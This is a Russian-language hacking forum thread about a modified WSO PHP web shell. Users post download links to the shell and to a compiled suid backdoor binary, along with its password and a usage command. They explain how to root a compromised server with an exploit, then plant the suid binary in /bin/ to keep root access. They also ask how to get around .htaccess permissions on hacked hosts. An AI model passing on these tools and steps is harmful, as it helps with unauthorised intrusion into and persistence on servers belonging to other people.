Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна. Добавлена опция дампа определенных колонок таблиц. Скриншот: Код на pastebin.com: http://pastebin.com/WvZTc46s
В WSO из первого поста есть ошибка в параметрах: Правьте) Готовый запакованный вариант: http://pastebin.com/7fn3hebC
как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите
ссылка сдохла! скиньте ещё раз Скомпилированный суидник плз! и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт! в чём может быть проблемма?
Самому не скомпилить чтоли? 1) Просто суидник: http://www.sendspace.com/file/hgwwez 2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj Пасс на судник: 112s233 Использование: ./suid 112s233 'uname -a; id'
да уже скомпилил! но вот следующий вопрос остаётся открытым! после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт! в чём может быть проблемма? серв до сих пор лежит!
Говоря на твоём языке - когда запускаешь суидник, (если он правильно настроен и туда закачен..) то ты получаешь рут, например, открываешь консоль, пишешь whoami, а те сервак отвечает www, ты юзаешь суидник, /bin/suid затем смотришь whoami, - root А суидник без рута просто не нужен, грубо говоря на то и суид - чтобы рута клепать)
Человеки добрые, подскажите в чём дело: На ломе прекрасно открывается данный шел из этой темы, только не работают Actions. Но не открывается вообще шел без модификации этой ( http://forum.antichat.ru/thread103155-wso.html ) пишет про ошибку: "Parse error: syntax error, unexpected ')', expecting '(' in лом/wso2.php on line 595
Когда я запускаю суидник он выполняется под владельцем. Но так как я его сам и залил, то никакого рута не получить.
В том то и дело, что всё в файле норм. Качаю прямо из топика автора, переименовываю, исправляю хеш пароля, заливаю на лом. Больше никаких исправлений не делаю
Простым смертным юзерам, www к примеру, не залить суидник в /bin/ т.к эта папка запрещена на запись, и нужно для начала сплойтом рутануть сервак, из под консоли (или сделать права), копирнуть суидник в /bin/ и затем запускать его чтобы получить рут, то есть чтобы не юзать каждый раз сплоит...
Так ты что хочешь то? Именно чтоб суидник работал под нужным тебе юзверем(ftp например), а не под веб-сервером? В таком случае нужно в коде суидника прописать uid и guid юзверя, а не рута(0). Можно еще настроить php как cgi/fcgi - тогда все скрипты будут работать от того же юзера, что и владелец файлов(обычно тот же, что и ftp и ssh твоего аккаунта).